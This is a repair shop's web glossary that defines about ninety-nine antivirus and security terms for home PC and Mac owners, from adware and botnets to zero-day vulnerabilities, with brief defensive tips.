Software that displays unwanted ads — pop-ups, banner injections, redirected search results. Often bundled with free downloads, sometimes a vehicle for worse infections.
If you're seeing pop-ups when nothing is open, you have adware, not "a virus."
A plain-English reference for the antivirus and security terms you'll encounter in our articles, your security software, and the news. Written for PC and Mac owners by the certified technicians at our Roswell shop.
Ninety-nine terms, alphabetized, across nine categories — from malware and attack methods to identity, privacy, network, mobile, and hardware-level security. Each term is tagged so you can tell at a glance what kind of thing you're looking at. Where useful, we've added a short tip on what to do if you encounter the thing. If a term isn't here, drop us a line — we'll add it.
Software that displays unwanted ads — pop-ups, banner injections, redirected search results. Often bundled with free downloads, sometimes a vehicle for worse infections.
The encryption algorithm used by virtually every secure system today — BitLocker, FileVault, WPA2/3, HTTPS. AES-256 means a 256-bit key, currently considered unbreakable by brute force.
A computer or backup drive that has no network connection — physically isolated from any network. The strongest defense against remote attack, used for offline backups and high-security systems.
Software that scans files and processes for known malware signatures and suspicious behavior. Windows Defender (built into Windows 10/11) is sufficient for most home users.
A targeted, long-running attack — usually nation-state or organized crime — that quietly maintains access to a network for months or years. Rarely a concern for home users.
The process of proving you are who you say you are — typically via password, biometric, or hardware key. Distinct from authorization, which is what you're allowed to do once authenticated.
A covert remote-access channel an attacker installs (or that a developer left in) so they can re-enter the system at will, bypassing normal authentication.
A separate copy of your data stored somewhere your machine can't reach in normal operation. The 3-2-1 rule: 3 copies, on 2 different media, with 1 off-site.
Authentication based on a physical trait — fingerprint, face, iris. Fast and convenient, but unlike a password, you can't change your fingerprint after a breach.
The low-level firmware that runs before your operating system loads, initializing hardware. UEFI replaced the older BIOS on modern machines and supports Secure Boot.
An old class of virus that infected the first sector of a hard disk so it ran before the OS loaded. Largely defeated by Secure Boot on modern UEFI systems, but rare specimens still appear.
A network of compromised computers controlled remotely by an attacker — used to send spam, run DDoS attacks, or mine cryptocurrency. Your machine can be a botnet member without you noticing.
Malware that changes your browser's homepage, search engine, or new-tab page to one the attacker controls — usually to push ads or harvest search data.
An attack that tries every possible password until one works. Defended against by long passwords, rate limiting, and lockout policies.
A puzzle (pick the traffic lights, click the boxes) used to distinguish humans from automated bots. Increasingly defeated by AI; many sites have moved to invisible behavioral checks instead.
An attack that overlays an invisible button on top of what you think you're clicking — you "Like" something or grant a permission without realizing.
A small piece of data a website stores in your browser — used legitimately for login sessions and preferences, sometimes abused for cross-site tracking. Not malware on its own.
An attack that takes username/password pairs leaked from one breach and tries them on other sites, banking on password reuse. Defeated by a unique password per site.
Software that secretly uses your machine's CPU or GPU to mine cryptocurrency for an attacker. Often shows up as a hot, slow, fan-running computer with no visible cause.
Parts of the internet that require special software (commonly Tor) to access. Used for both privacy-protective and illegal activity, including the sale of stolen credentials.
An incident where data — credentials, personal info, financial data — leaks from a company's systems into the wild. Free site haveibeenpwned.com tells you if your email is in known breaches.
An attack that overwhelms a server or service with traffic from many sources at once, knocking it offline. Targets are usually businesses, not home users.
AI-generated audio or video impersonating a real person. Increasingly used in voice-phishing scams that imitate a family member's voice or a CEO's face on a video call.
A cryptographic credential that proves a website (or person) is who it claims to be. The lock icon in your browser checks the site's certificate against a chain of trusted authorities.
An attack that changes which servers your machine asks to translate domain names — silently redirecting your traffic to attacker-controlled sites even when the URL looks correct.
Malware that installs automatically when you visit a compromised website, exploiting a browser or plugin vulnerability without any click required.
A modern, behavior-based step beyond traditional antivirus. Records what processes do and flags suspicious patterns. Mostly a business tool; some consumer AV products now include EDR-style features.
Mathematical scrambling of data so only someone with the right key can read it. Two flavors: at rest (BitLocker, FileVault) protects a stolen drive; in transit (HTTPS, VPN) protects data on the wire.
Any device on a network — laptop, phone, server, smart fridge. "Endpoint security" means protecting individual devices rather than the network around them.
Code that takes advantage of a specific vulnerability in software to do something the software wasn't supposed to allow — usually to run an attacker's code.
When AV flags a legitimate file as malicious. Common with heuristic detection. If you're sure a flagged file is safe, you can usually allow it; if you're not sure, ask us.
Modern malware that runs entirely in memory and leaves no executable file on disk. Defeats signature-based AV; detected only by behavior monitoring or memory forensics.
A filter between your machine (or network) and the internet that decides what traffic is allowed in or out. Built into Windows and macOS; also a feature of your home router.
European data-protection law that gives individuals rights over how their personal data is collected, stored, and used. Has shaped privacy practices and cookie banners worldwide.
A one-way mathematical fingerprint of a file or password. Two different inputs essentially never produce the same hash. Used for integrity checks and for storing passwords without storing the password itself.
AV detection based on behavior patterns rather than known signatures — flags software that acts like malware even if it's never been seen before. Catches more new threats but produces more false positives.
A web standard that tells your browser "always use HTTPS for this site, never plain HTTP." Defends against downgrade attacks where an attacker tries to force you onto unencrypted HTTP.
The encrypted version of HTTP, indicated by the lock icon in your browser's address bar. Protects what you send to and receive from a site, but doesn't guarantee the site itself is trustworthy.
When someone impersonates you using stolen credentials or personal data — opening accounts, filing tax returns, or taking out loans in your name. Recovery can take months.
Network-monitoring tools that watch for suspicious traffic. IDS alerts; IPS actively blocks. Mostly business-grade, but some consumer routers and firewalls include lightweight IDS features.
The structured process of detecting, containing, eradicating, and recovering from a security incident. Has a formal lifecycle in business security but the principles apply at home too.
Networked smart devices — thermostats, doorbells, fridges, cameras, light bulbs. Often poorly secured and a common entry point onto home networks.
Removing the manufacturer's software restrictions on a phone or tablet so you can install apps from outside the official store. Voids most security guarantees of the device.
Software (occasionally hardware) that records every keystroke — capturing passwords, messages, and credit card numbers as you type them. Usually bundled inside spyware.
The principle that a user, program, or service should have only the access it needs to do its job — no more. The single most important architectural defense in security.
Malicious code that lies dormant until a specific trigger (a date, a condition) fires it. Often planted by an insider before they leave a company.
Malware embedded in Office document macros (Word, Excel). Triggered when you open the file and click "Enable Macros." Still common in business phishing.
Umbrella term for malicious software. Includes viruses, worms, trojans, spyware, ransomware, rootkits, adware, and others. The word "virus" is often misused to mean any of these.
Requiring a second proof beyond your password — usually a code from an authenticator app or hardware key. SMS codes are better than nothing but vulnerable to SIM-swap attacks.
An attack where the attacker secretly relays and possibly alters communication between two parties who believe they're talking directly to each other. Common on unsecured public Wi-Fi.
Dividing a network into separate zones (your laptops, your IoT devices, your guest Wi-Fi) so a compromise in one zone can't easily reach the others. A common pattern: main + IoT + guest.
The standard that lets you "Sign in with Google/Apple/Microsoft" on third-party sites without giving them your password. The site receives a limited-scope token instead.
A passwordless login standard backed by Apple, Google, and Microsoft that replaces passwords with a cryptographic key tied to your device's biometric. Cannot be phished.
A program that stores a unique strong password for every account, locked behind one master password. Bitwarden, 1Password, and similar are far safer than reusing passwords.
A software update that fixes a known vulnerability. The single most effective defense against most malware is keeping your OS and apps patched.
An attack that secretly redirects your traffic from a legitimate site to a fake one — usually via DNS hijacking — without changing the URL you typed in your browser.
A fake email, text, or page designed to look like a legitimate one (your bank, Microsoft, the IRS) to trick you into entering credentials or clicking a malicious link. The most common way home users get compromised.
An attacker who's gained limited access then exploits a vulnerability to gain administrator-level access on a compromised machine. The bridge from "got in" to "owns everything."
A pair of mathematically linked keys used in asymmetric cryptography. Anything encrypted with the public key can only be decrypted by the private key. Underpins HTTPS, SSH, and modern messaging apps.
Borderline software — toolbars, "registry cleaners," fake optimizers — that isn't quite malware but isn't something you wanted either. Usually bundled with free downloads.
An isolated holding area inside your antivirus program where suspect files are kept (encrypted, unable to run) until you decide whether to delete or restore them.
Phishing delivered via a malicious QR code — on a parking meter, a restaurant menu, an email attachment. Bypasses URL-filtering since the link is hidden inside the image.
Malware that encrypts your files and demands payment (usually in cryptocurrency) for the decryption key. The defense is offline backups; once encrypted without backups, recovery is rarely possible.
The long, randomly-generated string that lets you decrypt a BitLocker or FileVault drive if you lose your password. Without it, the drive is unrecoverable.
Malware that buries itself deep in the operating system to hide other malware from antivirus and from you. Detection usually requires booting the drive into a separate environment.
A random value added to a password before hashing so two users with the same password produce different hashes. Prevents pre-computed lookup-table attacks.
An isolated environment where suspect software runs without being able to affect the rest of the system — used by AV products to safely test files, and by browsers to contain page code.
Fake "Your computer is infected!" pop-ups that try to panic you into installing a program (which is itself the malware) or paying for fake support. Often delivered via web ads.
A UEFI feature that refuses to load operating-system code that hasn't been signed by a trusted vendor. Defends against bootkits and rootkits that try to load before the OS.
Stealing the cookie or token that proves you're logged in to a site, then using it to access the account without needing the password. Why HTTPS and HSTS matter.
A unique fingerprint (often a hash or byte pattern) that identifies a specific piece of known malware. Effective for known threats, useless for new ones — hence the move toward heuristic and behavioral methods.
Convincing a mobile carrier (often via social engineering) to transfer your phone number to an attacker's SIM card — defeating SMS-based 2FA and potentially locking you out of accounts.
A physical device attached to an ATM, gas pump, or card reader that records magnetic-stripe data as you swipe. Wiggle the card slot before inserting — skimmers often feel loose.
Phishing delivered via text message — fake delivery notifications, fake bank alerts, fake IRS warnings. Has overtaken email as the most common phishing channel for personal accounts.
A team or facility that monitors a network 24/7 for security events. Mostly a business concept; large enterprises run a SOC, smaller ones contract one.
Manipulating a person rather than a machine — a fake phone call from "Microsoft support," a phishing email, a tailgater at the office door. The human is almost always easier to compromise than the technology.
Phishing customized for a specific target — using their real name, employer, or recent project — making it far harder to spot than mass phishing. Often the first step in a major breach.
Malware that secretly observes — keystrokes, screenshots, microphone, browsing history — and exfiltrates the data to an attacker. Often combined with keyloggers.
An attack that smuggles database commands into a website's text fields. Mostly a web-developer concern, but a common cause of the data breaches that end up exposing your credentials.
The encryption protocol underlying HTTPS. SSL is the older name; TLS is the current standard. The lock icon in your browser means a TLS connection is active.
One login that grants access to multiple related services. "Sign in with Microsoft 365" is SSO. Convenient, but a compromised SSO account is a master key.
An attack that compromises a trusted vendor (a software updater, a hardware supplier, a cloud provider) to reach the vendor's many customers at once. SolarWinds and 3CX are well-known examples.
Anyone behind a cyberattack — categorized by motivation (financial, political, ideological) and capability (script kiddie, criminal, nation-state).
A small chip on your motherboard that stores encryption keys and credentials securely. Required by Windows 11; used by BitLocker and Windows Hello.
Malware disguised as something legitimate. Named for the Trojan Horse — you let it in voluntarily because it looked useful. The most common modern infection vector by a wide margin.
The Windows prompt that pops up before changes to system settings or installations. Annoying when frequent, but the most effective defense against silent installs.
In the strict sense: code that attaches itself to a legitimate file and replicates when that file is opened. The word is widely used (loosely) to mean any malware, but true viruses are now relatively rare compared to trojans.
Phishing delivered by phone call — fake "Microsoft support," fake bank fraud alerts, fake IRS warnings. Caller ID spoofing makes the number appear legitimate.
A way to separate one physical network into isolated logical networks. Used at home (on better routers) to keep IoT devices off your main network.
An encrypted tunnel between your device and a VPN provider's server, used to protect traffic on untrusted networks (public Wi-Fi) and to obscure your IP. Doesn't protect you from malware, only from network eavesdropping.
A flaw in software (or hardware) that can be exploited to make it do something it wasn't supposed to. Patches close vulnerabilities; until patched, a vulnerability is an open door.
An attacker compromises a website that members of a target group are known to visit (an industry forum, a niche news site) and waits for the targets to come to them. Indirect, hard to detect.
Phishing aimed specifically at high-value targets — executives, finance staff, IT administrators — usually with a hand-crafted message that's harder to spot than mass phishing.
Capturing wireless network traffic from nearby devices. Modern HTTPS makes most captured traffic unreadable, but unsecured Wi-Fi networks still leak metadata and connection patterns.
Self-replicating malware that spreads across networks on its own — no host file required and no user action needed. Famous examples: Conficker, WannaCry.
Wi-Fi encryption standards. WPA3 is current; WPA2 is acceptable; anything older (WEP, WPA1) is broken and trivially intercepted.
An attack where malicious JavaScript injected into one site runs in your browser when you visit, often stealing cookies or session tokens. A web-developer issue, but the cause of many account takeovers.
A vulnerability that the software vendor doesn't know about yet, meaning no patch exists. Named for the number of days defenders have had to fix it. Highly valuable to attackers.
A computer that's been compromised and added to a botnet without the owner knowing. Receives commands from a command-and-control server.
Same-day diagnostics, transparent pricing, and a 90-day warranty on every repair. Submit your request now or call us directly.
Tell us about the issue — we'll respond within one business hour.
A technician will reach out within one business hour.